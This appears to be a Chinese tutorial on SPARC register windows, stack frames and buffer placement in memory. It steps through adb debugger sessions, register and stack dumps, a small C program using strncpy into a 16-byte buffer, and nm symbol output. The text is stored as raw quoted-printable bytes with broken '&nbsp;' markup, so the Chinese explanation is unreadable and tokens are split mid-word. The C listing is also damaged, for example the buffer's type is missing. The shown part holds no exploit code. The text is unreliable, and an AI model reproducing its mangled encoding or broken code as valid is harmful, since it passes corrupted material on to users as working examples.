restore
&n=
bsp; &nb=
sp; ret
/*
=CE=D2=C3=C7=BC=CC=D0=F8=CD=F9=CF=C2=C3=
=E6=D6=B4=D0=D0=A3=BA
*/
:c
breakpoint=20
=
at:
foo1: =
save %sp, -0x60,=20
=
%sp
/*
=D6=D0=B6=CF=D4=DA=BA=AF=CA=FDfoo1=B6=
=CF=B5=E3=B4=A6=A1=A3=B5=A5=B2=BD=D6=B4=D0=D0save=D6=B8=C1=EE=B2=A2=D2=C6=
=B6=AF=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA
*/
:s
stopped=20
=
at: &nbs=
p;
foo1+4: =20
st %i0, [%fp +=20
0x44]
/*
=D6=B8=C1=EE"save %sp, =
-0x60,=20
=
%sp"=B0=D1sp=D6=B8=D5=EB=CF=F2=B5=CD=B5=D8=D6=B7=D2=C6=B6=AF=C1=CB0x60=B8=
=F6=D7=D6=BD=DA=A3=AC=CA=B5=BC=CA=C9=CF=D5=E2=BE=CD=CE=AAfoo1=D4=DA=B6=D1=
=D5=BB=D6=D0=BF=AA=B1=D9=C1=CB=D2=BB=B8=F6=D0=C2=B5=C4=B6=D1=D5=BB=BF=E9=A1=
=A3=D3=EB=B4=CB=CD=AC=CA=B1=A3=AC=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=D2=B2=B7=A2=
=C9=FA=D2=C6=B6=AF=A3=AC=EC=B6=CA=C7foo1=BE=CD=D3=D0=C1=CB=D2=BB=B8=F6=D3=
=EBmain=BA=AF=CA=FD=B2=BB=CD=AC=B5=C4=A1=A2=D0=C2=B5=C4=BC=C4=B4=E6=C6=F7=
=B4=B0=BF=DA=A1=A3=D5=E2=B8=F6=B4=B0=BF=DA=D3=EBmain=BA=AF=CA=FD=BC=C4=B4=
=E6=C6=F7=B4=B0=BF=DA=B5=C4=B9=D8=CF=B5=C8=E7=CF=C2=CD=BC=CB=F9=CA=BE=A3=BA=
=C6=E4=D6=D0=A3=AC=B5=F7=D3=C3=BA=AF=CA=FDmain=B5=C4=CA=
=E4=B3=F6=BC=C4=B4=E6=C6=F7o0-o7=D3=EB=B1=BB=B5=F7=D3=C3=BA=AF=CA=FDfoo1=B5=
=C4=CA=E4=C8=EB=BC=C4=B4=E6=C6=F7i0-i7=CA=C7=CD=AC=D2=BB=D7=E9=BC=C4=B4=E6=
=C6=F7=A3=AC=CE=AA=C1=BD=B8=F6=BA=AF=CA=FD=B9=B2=D3=C3(=D3=A2=CE=C4=D6=D0=
=BD=D0=D7=F7overlapped)=A3=AC=CE=D2=C3=C7=D4=DA=C7=B0=C3=E6=D2=B2=CC=E1=B5=
=BD=D5=E2=CA=C2=A1=A3=D4=DA=BA=AF=CA=FD=B5=F7=D3=C3(call)=D6=AE=C7=B0=A3=AC=
o0-o5=BB=E1=B3=E4=CC=EE=C9=CF=B1=BB=B5=F7=D3=C3=BA=AF=CA=FD=B5=C4=CA=E4=C8=
=EB=B2=CE=CA=FD=A1=A3=CB=E6=D7=C5=B3=CC=D0=F2=BD=F8=C8=EB=B1=BB=B5=F7=D3=C3=
=BA=AF=CA=FDfoo1=A3=ACo0-o5=D2=B2=BE=CD=B3=C9=CE=AA=B1=BB=B5=F7=D3=C3=BA=AF=
=CA=FD=B5=C4=CA=E4=C8=EB=BC=C4=B4=E6=C6=F7=A3=AC=D4=AD=BA=AF=CA=FDmain=B5=
=C4sp=D2=B2=BE=CD=B1=E4=B3=C9=B5=B1=C7=B0=BA=AF=CA=FDfoo1=B5=C4fp=A1=A3
=B5=C8=B5=BD=D7=EE=BA=F3foo1=D6=B4=D0=D0=CD=EA=B1=CF=B7=B5=BB=D8mai=
n=BA=AF=CA=FD=CA=B1=A3=AC=D6=B8=C1=EErestore=BB=E1=D6=B4=D0=D0=A3=AC=BC=C4=
=B4=E6=C6=F7=B4=B0=BF=DA=B7=A2=C9=FA=C4=E6=CF=F2=D2=C6=B6=AF=A3=BA=D2=B2=BE=
=CD=CA=C7foo1=B5=C4=CA=E4=C8=EB=BC=C4=B4=E6=C6=F7=B1=E4=B3=C9main=B5=C4=CA=
=E4=B3=F6=BC=C4=B4=E6=C6=F7=A3=ACfoo1=B5=C4fp=B1=E4=B3=C9main=B5=C4=B5=B1=
=C7=B0=B6=D1=D5=BB=BF=E9=D6=B8=D5=EB=BC=C4=B4=E6=C6=F7sp=A1=A3=CD=AC=CA=B1=
=A3=AC=CF=B5=CD=B3=B8=F9=BE=DDfoo1=B5=C4i7=BF=C9=D2=D4=BC=C6=CB=E3=B3=F6f=
oo1=B7=B5=BB=D8=B5=BDmain=BA=AF=CA=FD=B5=C4=B5=D8=D6=B7=A3=AC=D5=E2=B8=F6=
=B7=B5=BB=D8=B5=D8=D6=B7=D3=A6=B8=C3=CA=C7%i7+8Bytes=A3=AC=D2=B2=BE=CD=CA=
=C7=B5=C8=D3=DA=B6=D1=D5=BB=BF=E9=B5=DA0x3C=B5=C4=C4=DA=C8=DD+8Bytes=20
=
(=D2=F2=CE=AA=D2=D1=BE=AD=D3=D0=D2=BB=B8=F64Byte=B5=C4=D6=B8=C1=EE=D4=DAp=
ipeline=D6=D0=D4=CB=D0=D0=C1=CB=A3=AC=CB=F9=D2=D4=D2=BB=B9=B2=D2=AA=BC=D3=
8Bytes)=A1=A3
=C9=CF=C3=E6=CB=F9=CB=B5=B5=C4=B6=BC=CA=C7=D0=A9=C0=ED=
=C2=DB=A3=AC=CE=D2=C3=C7=C1=AA=CF=B5=CA=B5=BC=CA=C0=B4=BA=CB=CA=B5=D2=BB=CF=
=C2=B5=B1=C7=B0=BA=AF=CA=FDfoo1=B5=C4=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=D2=D4=
=BC=B0=CB=FC=B5=C4=B5=B1=C7=B0=B6=D1=D5=BB=BF=E9%sp=B5=C4=C4=DA=C8=DD=A3=BA=
*/
$r
g0 0 =
&=
nbsp; &n=
bsp; =20
=
l0 0
g1 ff19=
5f20 _return_zero &nb=
sp; l1 0
g2&=
nbsp; 0 &=
nbsp; &n=
bsp; =20
=
l2 0
g3 0&nb=
sp; &nbs=
p; =
; =20
=
l3 0
g4 0&nb=
sp; &nbs=
p; =
; =20
=
l4 0
g5 0&nb=
sp; &nbs=
p; =
; =20
=
l5 0
g6 0&nb=
sp; &nbs=
p; =
; =20
=
l6 0
g7 0&nb=
sp; &nbs=
p; =
; =20
=
l7 0
o0 0&nb=
sp; &nbs=
p; =
; =20
=
i0 ffbefe06
o1 &nb=
sp;0 &nb=
sp; &nbs=
p; =20
=
i1 0
o2 0&nb=
sp; &nbs=
p; =
; =20
=
i2 0
o3 0&nb=
sp; &nbs=
p; =
; =20
=
i3 0
o4 0&nb=
sp; &nbs=
p; =
; =20
=
i4 0
o5 0&nb=
sp; &nbs=
p; =
; =20
=
i5 0
sp ffbe=
fc00 &nb=
sp; &nbs=
p; fp ffbefc60
o7 &=
nbsp; 0 &=
nbsp; &n=
bsp; =20
=
i7 10758 =
=20
main+0x10
y 0
tstate:=20
4482001a02 (ccr=3D0x44, asi=3D0x82, =
pstate=3D0x1a,=20
cwp=3D0x2)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 =
cle:0=20
mg:0 ig:0
pc 10704=20
=
foo1+4: =
=20
st %i0, [%fp +=20
0x44]
npc 10708=20
=
foo1+8: =
=20
sethi %hi(0x20800),=20
=
%l0
ffbefc00/24X
ffbefc00: =20
=
0 =
=20
=
0 =
=20
=
0 =
=20
=
0
&n=
bsp; 0 &n=
bsp; =20
=
0 =
=20
=
0 =
=20
=
0
&n=
bsp; ffbefe06 &=
nbsp; 0 &=
nbsp; =20
=
0 =
=20
=
0
&n=
bsp; 0 &n=
bsp; =20
=
0 =
=20
=
ffbefc60 10758
&n=
bsp; &nb=
sp; 10674 =
; =20
=
0 =
=20
=
0 =
=20
=
0
&n=
bsp; 0 &n=
bsp; =20
=
0 =
=20
=
ffbefc80 20820
/*foo1=D6=BB=D3=D0=D2=BB=B8=F6=CA=E4=C8=EB=B2=CE=CA=FD----=BC=B4=D6=B8=CF=
=F2=D7=D6=B7=FB=B4=AE"ABCD"=B5=C4=D6=B8=D5=EB=A3=AC=D5=E2=B8=F6=D6=B8=D5=EB=
0xffbefe06=B1=A3=B4=E6=D4=DAi0=BC=C4=B4=E6=C6=F7=D6=D0=A3=AC=B6=F8=C6=E4=CB=
=FB=B5=C4=CA=E4=C8=EB=BC=C4=B4=E6=C6=F7=CA=C7=BF=D5=B5=C4=A1=A3foo1=B5=C4=
=CA=E4=B3=F6=BC=C4=B4=E6=C6=F7o0-o7=CF=D6=D4=DA=D2=B2=B6=BC=CA=C7=BF=D5=B5=
=C4=A1=A3fp=BC=C4=B4=E6=C6=F7=B1=A3=B4=E6=C9=CF=D2=BB=B8=F6=B6=D1=D5=BB=BF=
=E9=B5=C4=D6=B8=D5=EB=A3=AC=D2=B2=BE=CD=CA=C7main=BA=AF=CA=FD=B5=C4=B6=D1=
=D5=BB=BF=E9=B5=C4=D6=B8=D5=EB0xffbefc60=A1=A3sp=BC=C4=B4=E6=C6=F7=CE=AA=B5=
=B1=C7=B0=BA=AF=CA=FD=B6=D1=D5=BB=BF=E9=B5=C4=D6=B8=D5=EB0xffbefc00=A1=A3=
=CE=D2=C3=C7=C9=CF=C3=E6=BB=B9=D3=C3/24X=B8=F1=CA=BD=B0=D1sp=D6=B8=
=CF=F2=B5=C4=B6=D1=D5=BB=BF=E9=CF=D4=CA=BE=B3=F6=C0=B4=A3=AC=C7=EB=B4=F3=BC=
=D2=CE=C2=CF=B0=D2=BB=CF=C2=CB=FC=B5=C4=C4=DA=C8=DD=A1=A3=CC=D8=B1=F0=CC=E1=
=C7=EB=B4=F3=BC=D2=D7=A2=D2=E2=B5=C4=CA=C7=A3=BA%sp+0x3C=D6=D0=CF=D6=D4=DA=
=CE=AA10758=A3=AC=D5=FD=CA=C7=B5=F7=D3=C3=B5=B1=C7=B0=BA=AF=CA=FDfoo1=B5=C4=
=D6=B8=C1=EE"call foo1"=B5=C4=B5=D8=D6=B7=A3=AC=B5=
=C8=B5=BDfoo1=B7=B5=BB=D8=B5=BDmain=CA=B1=A3=AC=CF=B5=CD=B3=BC=C6=CB=E3=B5=
=C4=B7=B5=BB=D8=B5=D8=D6=B7=CE=AA10758+8Bytes=3D10760=A1=A3
=CF=C2=
=C3=E6=BC=CC=D0=F8=D6=B4=D0=D0=B3=CC=D0=F2=A3=AC=C7=EB=B4=F3=BC=D2=D5=F6=B4=
=F3=D1=A9=C1=C1=B5=C4=D1=DB=BE=A6=BA=CB=CA=B5=B6=D4=D5=D5=A3=AC=CE=D2=BE=CD=
=B2=BB=CF=F3=CC=C6=C9=AE=C4=C7=D1=F9=DF=B4=DF=B4=CD=E1=CD=E1=C1=CB=A1=A3<=
BR>*/
foo1+4/8i
foo1+4: &n=
bsp;=20
st %i0, [%fp +=20
=
0x44]
&nbs=
p; sethi =20
%hi(0x20800),=20
=
%l0
=
or %l0, =
0x1e0,=20
=
%l0
=
call 0x20870
&nbs=
p; =
; or %l0,=20
%g0,=20
=
%o0
=
call foo2 =
; //=B8=C3=D6=B8=C1=EE=B5=D8=D6=B7=CE=AA=
10718
&nbs=
p; or %i0=
,=20
%g0,=20
=
%o0
=
call 0x20870
:centered=20
foo1
breakpoint=20
=
at:
foo2: &=
nbsp; =20
save %sp, -0x60,=20
=
%sp
/*
=D6=D0=B6=CF=D4=DA=B6=CF=B5=E3foo2=B4=A6=A1=A3=B5=A5=B2=BD=D6=
=B4=D0=D0save=D6=B8=C1=EE=B6=F8=D2=C6=B6=AF=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=
*/
:s &=
nbsp;
stopped=20
=
at:
foo2+4: =20
st %i0, [%fp +=20
=
0x44]
/*
=CF=D4=CA=BE=B5=B1=C7=B0=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=C4=DA=
=C8=DD=A3=BA
*/
$r &=
nbsp;
g0 0 &=
nbsp; &n=
bsp; &nb=
sp; =20
=
l0 0
g1 4&nb=
sp; &nbs=
p; =
; =20
=
l1 0
g2 0&nb=
sp; &nbs=
p; =
; =20
=
l2 0
g3 0&nb=
sp; &nbs=
p; =
; =20
=
l3 0
g4 0&nb=
sp; &nbs=
p; =
; =20
=
l4 0
g5 0&nb=
sp; &nbs=
p; =
; =20
=
l5 0
g6 0&nb=
sp; &nbs=
p; =
; =20
=
l6 0
g7 0&nb=
sp; &nbs=
p; =
; =20
=
l7 0
o0 0&nb=
sp; &nbs=
p; =
; =20
=
i0 ffbefe06
o1 &nb=
sp;0 &nb=
sp; &nbs=
p; =20
=
i1 0
o2 0&nb=
sp; &nbs=
p; =
; =20
=
i2 0
o3 0&nb=
sp; &nbs=
p; =
; =20
=
i3 0
o4 0&nb=
sp; &nbs=
p; =
; =20
=
i4 0
o5 0&nb=
sp; &nbs=
p; =
; =20
=
i5 0
sp ffbe=
fba0 &nb=
sp; &nbs=
p; fp ffbefc00
o7 &=
nbsp; 0 &=
nbsp; &n=
bsp; =20
=
i7 10718 =
=20
foo1+0x18
y 0
tstate:=20
4482001a02 (ccr=3D0x44, asi=3D0x82, =
pstate=3D0x1a,=20
cwp=3D0x2)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 =
cle:0=20
mg:0 ig:0
pc 106cc=20
=
foo2+4: =
=20
st %i0, [%fp +=20
0x44]
npc 106d0=20
=
foo2+8: =
=20
sethi %hi(0x20800),=20
=
%o0
/*
=CF=D4=CA=BE=B5=B1=C7=B0=B6=D1=D5=BB=BF=E9=C4=DA=C8=DD
*/=
ffbefba0/24X
ffbefba0: =20
=
0 =
=20
=
0 =
=20
=
0 =
=20
=
0
&n=
bsp; 0 &n=
bsp; =20
=
0 =
=20
=
0 =
=20
=
0
&n=
bsp; ffbefe06 &=
nbsp; 0 &=
nbsp; =20
=
0 =
=20
=
0
&n=
bsp; 0 &n=
bsp; =20
=
0 =
=20
=
ffbefc00 10718
&n=
bsp; &nb=
sp; 0 &nb=
sp; =20
=
0 =
=20
=
0 =
=20
=
0
&n=
bsp; 0 &n=
bsp; =20
=
0 =
=20
=
0 =
=20
=
1
foo2+4/5i
foo2+4: =
=20
st %i0, [%fp +=20
=
0x44]
&nbs=
p; sethi =20
%hi(0x20800),=20
=
%o0
=
or %o0, =
0x1c0,=20
=
%o0
=
call 0x20870
&nbs=
p; =
; or %i0,=20
%g0, %o1
:c
Input String is ABCD in foo2
leaving=20
foo1
process=20
=
terminated
$q
[moda@beijing]$
=C9=CF=C3=E6=CE=D2=D2=D1=BE=AD=
=BE=A1=BF=C9=C4=DC=B5=C4=BD=E9=C9=DC=C1=CB=B9=D8=D3=DASparc=B4=A6=C0=ED=C6=
=F7=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA(Regsiter=20
Window)=BA=CD=B6=D1=D5=BB=BF=E9(Stack=20
=
Frame)=B5=C4=B8=C5=C4=EE=A3=AC=C8=E7=B9=FB=B4=F3=BC=D2=BB=B9=CA=C7=BA=FD=C0=
=EF=BA=FD=CD=BF=B5=C4=BB=B0=A3=AC=C4=C7=D6=BB=BA=C3=B9=D6=CE=D2=D0=A1=CA=B1=
=BA=F2=D3=EF=CE=C4=C0=CF=CA=A6=C3=BB=D3=D0=BD=CC=BA=C3=A1=A3
S=
parc=BB=BA=B3=E5=C7=F8=D4=DA=B6=D1=D5=BB=D6=D0=B5=C4=C4=DA=B4=E6=B7=D6=C5=
=E4=C7=E9=BF=F6=A3=BA
=B1=BE=C0=B4=CF=EB=B0=D1=BB=BA=B3=E5=C7=F8=
=B5=C4=C4=DA=B4=E6=B7=D6=C5=E4=C7=E9=BF=F6=D3=EB=BC=C4=B4=E6=C6=F7=B4=B0=BF=
=DA=BC=B0=B6=D1=D5=BB=BF=E9=D4=DA=C9=CF=C3=E6=D2=BB=C6=F0=BD=E9=C9=DC=A3=AC=
=B2=BB=B9=FD=C4=C7=BB=E1=B0=D1=B4=F3=BC=D2=B8=E3=B5=C3=B8=FC=BA=FD=CD=BF=A3=
=AC=CB=F9=D2=D4=CE=D2=B0=D1=CB=FC=B3=E9=B3=F6=C0=B4=B5=A5=B6=C0=BD=B2=A1=A3=
=CF=C2=C3=E6=B5=C4dummy.c=20
=
=D6=BB=CA=C7=B0=D1=C9=CF=C3=E6=B5=C4dummy.c=B3=CC=D0=F2=C9=D4=CE=A2=B8=C4=
=C1=CB=D2=BB=CF=C2=A3=AC=D4=DAfoo2=BA=AF=CA=FD=D6=D0=BC=D3=D2=BB=B8=F6=BB=
=BA=B3=E5=C7=F8buf=A1=A3=CE=D2=C3=C7=BD=AB=B0=D1=D7=D6=B7=FB=B4=AEAAAAAAA=
A=B4=AB=B5=BDbuf=D6=D0=C8=A5=A3=AC=BF=B4=CB=FC=C2=E4=D4=DA=C4=DA=B4=E6=C4=
=C4=B8=F6=B5=D8=B7=BD=A3=BA
<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3Ddummy.c=20
=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D&=
gt;
#include<stdio.h>
foo2=20
( char * str )
{
=20
buf[16];
strncpy(buf, str,=20
16);
printf("Input =
String is=20
%s in foo2 \n", buf);
}
foo1 ( char * str=20
)
{
=
printf("entered foo1=20
\n");
=20
foo2(str);
=
printf("leaving=20
foo1 \n");
}
main (int argc, char*=20
argv[])
{
foo1( =
argv[1]=20
=
);
}
<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D>
=D4=DADebug=D5=E2=
=B8=F6dummy=D6=AE=C7=B0=A3=AC=CE=D2=C3=C7=C0=B4=BF=B4=D2=BB=CF=C2=CB=FC=B5=
=C4=D6=B4=D0=D0=CE=C4=BC=FE=B5=C4namelist=A3=AC=C7=EB=B4=F3=BC=D2=D7=A2=D2=
=E2=B5=DA41=BA=C5----strncpy=20
=
=D3=EB=B5=DA68=BA=C5----printf=C1=BD=B8=F6symbol=B5=C4value=A3=AC=D5=E2=D0=
=A9values=CA=C7=BA=AF=CA=FDstrncpy=D3=EBprintf=D4=DAGlobal=20
Offset=20
=
Table(GOT)=D6=D0=B5=C4entries=A3=AC=CF=B5=CD=B3=CD=A8=B9=FD=D5=E2=D0=A9En=
tries=BF=C9=D2=D4=D5=D2=B5=BD=CB=FC=C3=C7=B6=D4=D3=A6=B5=C4=BA=AF=CA=FD=B5=
=C4=C6=F0=CA=BC=B5=D8=D6=B7=A1=A3
[moda@beijing]$=20
nm -x dummy
dummy:
[Index] =20
=
Value Size &nbs=
p; Type Bind Other=20
Shndx =20
=
Name
[18] |0x000209e8|0x00000000|SECT=20
|LOCL |0 |17 =20
|
[2] |0x000100d4|0x00000000|SECT =
|LOCL=20
=
|0 |1 |
[3]&=
nbsp; =20
|0x000100e8|0x00000000|SECT |LOCL=20
=
|0 |2 |
[4]&=
nbsp; =20
|0x000101d8|0x00000000|SECT |LOCL=20
=
|0 |3 |
[5]&=
nbsp; =20
|0x000103a8|0x00000000|SECT |LOCL=20
=
|0 |4 |
[6]&=
nbsp; =20
|0x00010560|0x00000000|SECT |LOCL=20
=
|0 |5 |
[7]&=
nbsp; =20
|0x000105a0|0x00000000|SECT |LOCL=20
=
|0 |6 |
[8]&=
nbsp; =20
|0x000105d0|0x00000000|SECT |LOCL=20
=
|0 |7 |
[9]&=
nbsp; =20
|0x00010610|0x00000000|SECT |LOCL=20
=
|0 |8 |
[10]=
|0x000107b0|0x00000000|SECT=20
|LOCL=20
=
|0 |9 |
[11]=
|0x00010800|0x00000000|SECT=20
|LOCL |0 |10 =20
|
[12] |0x00010850|0x00000000|SECT =
|LOCL=20
|0 |11 =20
|
[13] |0x00010854|0x00000000|SECT =
|LOCL=20
|0 |12 =20
|
[14] |0x00020858|0x00000000|SECT =
|LOCL=20
|0 |13 =20
|
[15] |0x0002085c|0x00000000|SECT =
|LOCL=20
|0 |14 =20
|
[16] |0x000208cc|0x00000000|SECT =
|LOCL=20
|0 |15 =20
|
[17] |0x000209bc|0x00000000|SECT =
|LOCL=20
|0 |16 =20
|
[19] |0x00020a10|0x00000000|SECT =
|LOCL=20
|0 |18 =20
|
[20] |0x00020a4f|0x00000000|SECT =
|LOCL=20
|0 |19 =20
|
[21] |0x00000000|0x00000000|SECT =
|LOCL=20
|0 |20 =20
|
[22] |0x00000000|0x00000000|SECT =
|LOCL=20
|0 |21 =20
|
[23] |0x00000000|0x00000000|SECT =
|LOCL=20
|0 |22 =20
|
[24] |0x00000000|0x00000000|SECT =
|LOCL=20
|0 |23 =20
|
[25] |0x00000000|0x00000000|SECT =
|LOCL=20
|0 |24 =20
|
[26] |0x00000000|0x00000000|SECT =
|LOCL=20
|0 |25 =20
|
[44] |0x000208cc|0x00000000|OBJT =
|GLOB=20
|0 |15 =20
=
|_DYNAMIC
[28] |0x00020a4f|0x00000000|OBJT=20
|LOCL |0 |19 =20
=
|_END_
[53] |0x00020858|0x00000000|OBJT=20
|GLOB |0 |13 =20
=
|_GLOBAL_OFFSET_TABLE_
[42] |0x0002085c|0x00000=
000|OBJT=20
|GLOB |0 |14 =20
=
|_PROCEDURE_LINKAGE_TABLE_
[27] |0x00010000|0x0=
0000000|OBJT=20
|LOCL=20
=
|0 |1 |_START_<=
BR>[54] |0x00000000|0x00000000|NOTY=20
|WEAK=20
=
|0 |UNDEF |__1cH__CimplKcplus_fini6F_v_=
[66] |0x00000000|0x00000000|NOTY=20
|WEAK=20
=
|0 |UNDEF |__1cH__CimplKcplus_init6F_v_=
[46] |0x00020a0c|0x00000004|OBJT=20
|GLOB |0 |17 =20
=
|___Argv
[51] |0x00020a08|0x00000004|OBJT=20
|GLOB |0 |17 =20
=
|__cg92_used
[34] |0x00020a04|0x00000004|OBJT=20
|LOCL |0 |17 =20
=
|__crt_scratch
[65] |0x000209e8|0x00000018|OBJT=
=20
|GLOB |0 |17 =20
=
|__environ_lock
[49] |0x00000000|0x00000000|NOT=
Y=20
|GLOB=20
=
|0 |ABS |__fsr_init_value[45] |0x00020a4f|0x00000000|OBJT=20
|GLOB |0 |18 =20
=
|_edata
[62] |0x00020a4f|0x00000000|OBJT=20
|GLOB |0 |19 =20
=
|_end
[52] |0x00020a00|0x00000004|OBJT=20
|GLOB |0 |17 =20
=
|_environ
[47] |0x00010858|0x00000000|OBJT=20
|GLOB |0 |12 =20
=
|_etext
[67] |0x00000000|0x00000000|NOTY=20
|WEAK=20
=
|0 |UNDEF |_ex_deregister
[31] =
|0x00010850|0x00000000|NOTY=20
|LOCL |0 |11 =20
=
|_ex_range0
[39] |0x00010850|0x00000000|NOTY=20
|LOCL |0 |11 =20
=
|_ex_range1
[61] |0x00000000|0x00000000|NOTY=20
|WEAK=20
=
|0 |UNDEF |_ex_register
[30] &n=
bsp; |0x000209cc|0x00000000|NOTY=20
|LOCL |0 |16 =20
=
|_ex_shared0
[38] |0x000209dc|0x00000000|NOTY=20
|LOCL |0 |16 =20
=
|_ex_shared1
[32] |0x00010610|0x00000000|NOTY=20
|LOCL=20
=
|0 |8 |_ex_text=
0
[40] |0x000107b0|0x00000000|NOTY=20
|LOCL=20
=
|0 |8 |_ex_text=
1
[57] |0x000208a4|0x00000000|FUNC=20
|GLOB=20
=
|0 |UNDEF |_exit
[64] &nb=
sp; |0x00010800|0x00000050|FUNC=20
|GLOB |0 |10 =20
=
|_fini
[48] |0x000107b0|0x00000050|FUNC=20
|GLOB=20
=
|0 |9 |_init[58] |0x00010854|0x00000004|OBJT=20
|GLOB |0 |12 =20
=
|_lib_version
[63] |0x00010610|0x000000d0|FUNC =
|GLOB=20
=
|0 |8 |_start[59] |0x0002088c|0x00000000|FUNC=20
|GLOB=20
=
|0 |UNDEF |atexit
[33] &n=
bsp; |0x00000000|0x00000000|FILE=20
|LOCL=20
=
|0 |ABS |crt1.s
[29]&nbs=
p; |0x00000000|0x00000000|FILE=20
|LOCL=20
=
|0 |ABS |crti.s
[37]&nbs=
p; |0x00000000|0x00000000|FILE=20
|LOCL=20
=
|0 |ABS |crtn.s
[1] =
; =20
|0x00000000|0x00000000|FILE |LOCL=20
=
|0 |ABS |dummy
[36] =
; |0x00000000|0x00000000|FILE=20
|LOCL=20
=
|0 |ABS |dummy.c
[43]&nb=
sp; |0x00020a00|0x00000004|OBJT=20
|WEAK |0 |17 =20
=
|environ
[60] |0x00020898|0x00000000|FUNC=20
|GLOB=20
=
|0 |UNDEF |exit
[55] &nbs=
p; |0x00010740|0x00000038|FUNC=20
|GLOB=20
=
|0 |8 |foo1
=
[56] |0x000106f0|0x0000003c|FUNC=20
|GLOB=20
=
|0 |8 |foo2
=
[50] |0x00010788|0x00000028|FUNC=20
|GLOB=20
=
|0 |8 |main
=
[41] |0x000208bc|0x00000000|FUNC=20
|GLOB=20
=
|0 |UNDEF |printf
[68] &n=
bsp; |0x000208b0|0x00000000|FUNC=20
|GLOB=20
=
|0 |UNDEF |strncpy
[35] &=
nbsp; |0x00000000|0x00000000|FILE=20
|LOCL=20
=
|0 |ABS |values-Xs.c
[mo=
da@beijing]$
=CF=C2=C3=E6=CE=D2=C3=C7=B0=D1=D0=C2=B5=C4dummy=D4=
=DADebug=C4=A3=CA=BD=CF=C2=D4=CB=D0=D0=A3=AC=C7=EBfollow=20
my comment closely=A3=BA
[moda@beijing]$ adb=20
=
dummy
foo1:b
foo2:b =
/*
=D4=DAfoo1=D3=EBfoo2=C8=EB=BF=DA=C9=E8=B6=
=CF=B5=E3=A1=A3=D2=D4=D7=D6=B7=FB=B4=AE"AAAAAAAA"=CE=AA=CA=E4=C8=EB=B2=CE=
=CA=FD=A3=AC=BF=AA=CA=BC=D4=CB=D0=D0=A3=BA
*/
:r=20
=
AAAAAAAA =
;
breakpoint=20
=
at:
foo1: &=
nbsp; =20
save %sp, -0x60,=20
=
%sp
/*
=B3=CC=D0=F2=D4=DD=CD=A3=D4=DAfoo1=B6=CF=B5=E3=B4=A6=A3=ACSi=
ngle=20
=
Step=D6=B4=D0=D0save=D6=B8=C1=EE
*/
:s =
;
st=
opped=20
=
at:
foo1+4: =20
st %i0, [%fp +=20
=
0x44]
/*
foo1=B6=D4=D3=A6=B5=C4=BC=C4=B4=E6=C6=F7=B4=B0=BF=DA=A3=BA=
*/
$r
g0 0 =
&=
nbsp; &n=
bsp; =20
=
l0 0
g1 ff19=
5f20 _return_zero &nb=
sp; l1 0
g2&=
nbsp; 0 &=
nbsp; &n=
bsp; =20
=
l2 0
g3 0&nb=
sp; &nbs=
p; =
; =20
=
l3 0
g4 0&nb=
sp; &nbs=
p; =
; =20
=
l4 0
g5 0&nb=
sp; &nbs=
p; =
; =20
=
l5 0
g6 0&nb=
sp; &nbs=
p; =
; =20
=
l6 0
g7 0&nb=
sp; &nbs=
p; =
; =20
=
l7 0
o0 0&nb=
sp; &nbs=
p; =
; =20
=
i0 ffbefdfe
o1 &nb=
sp;0 &nb=
sp; &nbs=
p; =20
=
i1 0
o2 0&nb=
sp; &nbs=
p; =
; =20
=
i2 ff1ba5e8 mem=
_lock
o3 0 &=
nbsp; &n=
bsp; &nb=
sp; =20
=
i3 0
o4 0&nb=
sp; &nbs=
p; =
; =20
=
i4 21fb8 =20
=
__cg92_used+0x15b0
o5 0 =
&=
nbsp; &n=
bsp; =20
=
i5 ff11b8c4 ate=
xit+0x74
sp ffbefbf8 &nb=
sp; &nbs=
p; fp &nb=
sp; ffbefc58
o7 0 &=
nbsp; &n=
bsp; &nb=
sp; =20
=
i7 10798 =
=20
main+0x10
y 0
tstate:=20
4482001a00 (ccr=3D0x44, asi=3D0x82, =
pstate=3D0x1a,=20
cwp=3D0x0)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 =
cle:0=20
mg:0 ig:0
pc 10744=20
=
foo1+4: =
=20
st %i0, [%fp +=20
0x44]
npc 10748=20
=
foo1+8: =
=20
sethi %hi(0x20800), %l0
:c
entered=20
=
foo1 &nb=
sp;//=D4=DAfoo1=BA=AF=CA=FD=D6=D0=B5=C4=CA=E4=B3=F6
breakpoint=20
=
at: &nbs=
p;
foo2: =20
save %sp, -0x70,=20
=
%sp
/*
=BC=CC=D0=F8=D6=B4=D0=D0=A3=AC=B3=CC=D0=F2=D4=DD=CD=A3=D4=DA=
foo2=B6=CF=B5=E3=B4=A6=A1=A3Single=20
=
Step=D6=B4=D0=D0save=D6=B8=C1=EE=B6=F8=D2=C6=B6=AF=BC=C4=B4=E6=C6=F7=B4=B0=
=BF=DA
*/
:s &=
nbsp;
stop=
ped=20
=
at:
foo2+4: =20
st %i0, [%fp +=20
=
0x44]
/*
=BA=AF=CA=FDfoo2=B6=D4=D3=A6=B5=C4=BC=C4=B4=E6=C6=F7=B4=B0=
=BF=DA=A3=BA
*/
$r
g0 0 =
&=
nbsp; &n=
bsp; =20
=
l0 0
g1 4&nb=
sp; &nbs=
p; =
; =20
=
l1 0
g2 0&nb=
sp; &nbs=
p; =
; =20
=
l2 0
g3 0&nb=
sp; &nbs=
p; =
; =20
=
l3 0
g4 0&nb=
sp; &nbs=
p; =
; =20
=
l4 0
g5 0&nb=
sp; &nbs=
p; =
; =20
=
l5 0
g6 0&nb=
sp; &nbs=
p; =
; =20
=
l6 0
g7 0&nb=
sp; &nbs=
p; =
; =20
=
l7 0
o0 0&nb=
sp; &nbs=
p; =
; =20
